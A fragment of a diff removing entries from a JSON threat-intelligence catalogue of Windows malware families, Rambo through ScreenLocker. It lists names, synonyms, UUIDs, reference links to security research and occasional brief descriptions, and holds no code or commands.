"https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor" - ] - }, - "uuid": "805b99d1-233d-4f7f-b343-440e5d507494", - "value": "Rambo", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo" - ] - }, - "uuid": "51f53823-d289-4176-af45-3fca7eda824b", - "value": "Ramdo", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Nimnul" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", - "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", - "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", - "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", - "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf", - "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", - "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", - "https://research.checkpoint.com/ramnits-network-proxy-servers/" - ] - }, - "uuid": "542161c0-47a4-4297-baca-5ed98386d228", - "value": "Ramnit", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", - "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/", - "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", - "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", - "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/" - ] - }, - "uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846", - "value": "Ranbyus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam", - "http://blog.talosintel.com/2016/07/ranscam.html" - ] - }, - "uuid": 
"50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b", - "value": "Ranscam", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc", - "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles" - ] - }, - "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", - "value": "Ransoc", - "description": "" - }, - { - "meta": { - "synonyms": [ - "WinLock" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock", - "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2", - "https://forum.malekal.com/viewtopic.php?t=36485&start=" - ] - }, - "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c", - "value": "Ransomlock", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", - "https://twitter.com/malwrhunterteam/status/977275481765613569", - "https://twitter.com/malwrhunterteam/status/997748495888076800" - ] - }, - "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5", - "value": "Rapid Ransom", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer", - "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html" - ] - }, - "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", - "value": "RapidStealer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" - ] - }, - "uuid": "e0a1407f-2595-4bd2-ba16-2c6d9be4e066", - "value": "rarstar", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ratabankapos", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", - "http://blog.trex.re.kr/3" - ] - }, - "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", - "value": "RatabankaPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", - "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", - "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" - ] - }, - "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", - "value": "RawPOS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Remote Control System", - "Crisis" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", - "https://www.f-secure.com/documents/996508/1030745/callisto-group", - "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" - ] - }, - "uuid": "c359c74e-4155-4e66-a344-b56947f75119", - "value": "RCS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv", - "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf" - ] - }, - "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", - "value": "rdasrv", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot", - "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", - "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html", - "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/", - "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under" - ] - }, - "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f", - 
"value": "ReactorBot", - "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" - ] - }, - "uuid": "826c31ca-2617-47e4-b236-205da3881182", - "value": "Reaver", - "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha", - "https://www.recordedfuture.com/redalpha-cyber-campaigns/" - ] - }, - "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", - "value": "RedAlpha", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", - "http://blog.macnica.net/blog/2017/12/post-8c22.html", - "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", - "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" - ] - }, - "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", - "value": "RedLeaves", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert", - "https://twitter.com/JaromirHorejsi/status/816237293073797121" - ] - }, - "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618", - "value": "Red Alert", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler", - "http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf" - ] - }, - "uuid": "ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7", - "value": "Red Gambler", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg", - "https://sensepost.com/discover/tools/reGeorg/", - "https://github.com/sensepost/reGeorg" - ] - }, - "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad", - "value": "reGeorg", - "description": "" - }, - { - "meta": { - 
"synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin", - "https://www.youtube.com/watch?v=jeLd-gw2bWo" - ] - }, - "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb", - "value": "Regin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", - "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "http://malware-traffic-analysis.net/2017/12/22/index.html", - "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", - "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", - "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", - "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", - "https://secrary.com/ReversingMalware/RemcosRAT/" - ] - }, - "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2", - "value": "Remcos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", - "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions" - ] - }, - "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada", - "value": "Remexi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" - ] - }, - "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9", - "value": "Remsec", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - 
"refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy" - ] - }, - "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c", - "value": "Remy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom", - "https://www.coresecurity.com/sites/default/files/resources/2017/03/Behind_Malware_Infection_Chain.pdf" - ] - }, - "uuid": "a1f137d4-298f-4761-935d-bd39ab898479", - "value": "Rerdom", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup", - "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/" - ] - }, - "uuid": "42fa55e3-e708-4c11-b807-f31573639941", - "value": "Retadup", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Tsukuba", - "Werdlod" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga", - "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", - "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", - "https://github.com/cocaman/retefe" - ] - }, - "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", - "value": "Retefe", - "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. 
The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic." - }, - { - "meta": { - "synonyms": [ - "Revetrat" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat", - "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/", - "https://isc.sans.edu/diary/rss/22590", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] - }, - "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f", - "value": "Revenge RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" - ] - }, - "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", - "value": "RGDoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu", - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - }, - "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043", - "value": "Rikamanu", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux" - ] - }, - "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a", - "value": "Rincux", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm", - "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/" - ] - }, - "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", - "value": "Ripper ATM", - "description": "" - }, 
- { - "meta": { - "synonyms": [ - "yellowalbatross" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock", - "https://github.com/securitykitten/malware_references/blob/master/rmshixdAPT-C-15-20160630.pdf" - ] - }, - "uuid": "95a26977-295f-4843-ad11-a3d9dcb6c192", - "value": "rock", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", - "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware" - ] - }, - "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e", - "value": "Rockloader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin" - ] - }, - "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", - "value": "Rofin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku" - ] - }, - "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c", - "value": "Rokku", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", - "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", - "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", - "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", - "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", - "https://www.youtube.com/watch?v=uoBQE5s2ba4" - ] - }, - "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", - "value": "RokRAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "CarbonGrabber" - ], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik", - "http://blogs.cisco.com/security/talos/rombertik" - ] - }, - "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1", - "value": "Rombertik", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos" - ] - }, - "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a", - "value": "Romeo(Alfa,Bravo, ...)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs" - ] - }, - "uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9", - "value": "Roopirs", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam", - "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" - ] - }, - "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", - "value": "Roseam", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover", - "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" - ] - }, - "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050", - "value": "Rover", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Mayachok", - "Cidox", - "BkLoader" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix", - "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", - "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", - "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", - "https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/", - 
"https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", - "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", - "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html" - ] - }, - "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f", - "value": "Rovnix", - "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least)." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", - "https://github.com/nccgroup/Royal_APT" - ] - }, - "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72", - "value": "RoyalCli", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", - "https://github.com/nccgroup/Royal_APT" - ] - }, - "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a", - "value": "Royal DNS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena", - "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena" - ] - }, - "uuid": "cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766", - "value": "Rozena", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", - 
"https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" - ] - }, - "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", - "value": "RTM", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos", - "https://boozallenmts.com/resources/news/rtpos-new-point-sale-malware-family-uncovered" - ] - }, - "uuid": "89ee2cb0-2c72-4a25-825b-bb56083fdd9b", - "value": "rtpos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv", - "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear" - ] - }, - "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2", - "value": "Ruckguv", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish" - ] - }, - "uuid": "e1564cfe-ab82-4c14-8f92-65af0d760d70", - "value": "Rumish", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat", - "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" - ] - }, - "uuid": "b746a645-5974-44db-a811-a024214b7fba", - "value": "running_rat", - "description": "" - }, - { - "meta": { - "synonyms": [ - "RCSU" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar", - "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction" - ] - }, - "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", - "value": "Rurktar", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", - "https://www.secureworks.com/blog/research-21041", - 
"http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", - "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", - "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", - "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/", - "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", - "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf", - "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/" - ] - }, - "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d", - "value": "Rustock", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Saga" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom", - "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", - "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", - "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/", - "http://malware-traffic-analysis.net/2017/10/13/index.html" - ] - }, - "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", - "value": "SAGE", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Sakurel" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", - "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", - "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", - "https://www.secureworks.com/research/sakula-malware-family" - ] - }, - "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b", - "value": "Sakula RAT", - "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files 
onto the compromised computer." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea", - "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf" - ] - }, - "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", - "value": "Salgorea", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" - ] - }, - "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a", - "value": "Sality", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", - "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", - "http://blog.talosintel.com/2016/03/samsam-ransomware.html", - "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", - "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/" - ] - }, - "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", - "value": "SamSam", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Daws" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny", - "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" - ] - }, - "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", - "value": "Sanny", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Hussarini" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust", - "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a", - 
"https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html" - ] - }, - "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e", - "value": "Sarhust", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", - "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", - "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", - "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" - ] - }, - "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", - "value": "Satan Ransomware", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", - "https://www.cylance.com/threat-spotlight-satan-raas" - ] - }, - "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", - "value": "Satana", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot", - "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" - ] - }, - "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369", - "value": "Sathurbot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", - "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", - "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos" - ] - }, - "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", - "value": "ScanPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken", - 
"https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", - "https://github.com/vithakur/schneiken" - ] - }, - "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d", - "value": "Schneiken", - "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.scote", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/" - ] - }, - "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", - "value": "Scote", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker", - 